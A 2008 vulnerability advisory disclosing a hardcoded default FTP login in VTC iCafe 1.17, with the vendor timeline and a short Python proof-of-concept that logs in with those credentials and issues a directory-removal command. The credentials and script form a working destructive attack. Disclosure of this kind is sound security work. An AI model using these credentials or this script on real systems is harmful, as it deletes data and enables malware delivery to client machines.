BLUE MOON SECURITY ADVISORY 2008-08

Title:Insecure default FTP password in VTC iCafe
Severity:Critical
Reporter:Blue Moon Consulting
Products:VTC iCafe 1.17
Fixed in:--

Description

VTC iCafe is an internet cafe management application. It uses a hardcoded insecure default FTP password VTCIntecom / VTCIntecom. The FTP server listens on port 6655 and distributes update files to the clients. A malicious user could use this knowledge to a) cause a denial of services on the clients by removing the FTP root directory, or b) place malwares such as virus, trojan on the client by replacing the update files.

Workaround

There is no workaround.

Fix

There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.

Disclosure

Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.

Initial vendor contact:
 August 12, 2008: Initial contact sent to support.icafe@vtc.vn
Vendor response:
 --
Public disclosure:
 August 20, 2008
Exploit code:
import ftplib

ftp = ftplib.FTP()
ftp.connect("localhost", 6655)
ftp.login("VTCIntecom", "VTCIntecom")
ftp.sendcmd("RMD \x00")
ftp.quit()

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.